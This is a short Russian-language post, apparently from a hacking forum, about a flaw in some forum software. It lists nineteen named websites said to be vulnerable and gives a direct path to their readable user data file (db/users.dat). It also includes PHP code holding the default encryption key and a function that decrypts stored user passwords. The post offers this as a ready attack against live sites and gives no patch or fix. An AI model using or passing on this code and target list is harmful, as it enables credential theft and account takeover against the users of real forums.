Данная уязвимость найдена на этих сайтах.

http://www.johnnyhollow.com/forum
http://www.laurenpowers.com/forums/
http://lugaversa.altervista.org/forum
http://www.avenueq.com/forum/
http://forum.kyrenee.com
http://www.fsjames.com/ultimate
http://www.ohiospeedskatingtour.com/forum/
http://sta.umbc.edu/orgs/sail/pages/forum
http://www.mpcs.ryerson.ca/~research/
http://www.primednr.com/upb/
http://www.killerdwarfs.net/messageboard/
http://www.stompchat.com/forum/
http://www.yeclaserve.com/forum/
http://users.aber.ac.uk/trc99/forum
http://www.bus.sfu.ca/clubs/BASS/BAM
http://waitz.dnsalias.org/upb/
http://www.hunggakungfu.com/forum/
http://www.diskusjonsforum.com
http://www.trek.dp.ua/forum

1) Файлы с пользователями можно смотреть. Например:

http://www.johnnyhollow.com/forum/db/users.dat

2) Пароли пользователя можно дешифровать . Ключ везде стоит по умолчанию.

Функция дешифрования:

<?
$key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtn eltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglm wrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupk zvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcui qggccl";
function t_decrypt($text, $key)
{
$crypt = "";
for($i=0;$i<strlen($text);$i++)
{
$i_key = ord(substr($key, $i, 1));
$i_text = ord(substr($text, $i, 1));
$n_key = ord(substr($key, $i+1, 1));
$i_crypt = $i_text + $n_key;
$i_crypt = $i_crypt - $i_key;
$crypt .= chr($i_crypt);
}
return $crypt;
}


$text="тут пароль для дешифрации";
echo t_decrypt($text, $key);
?>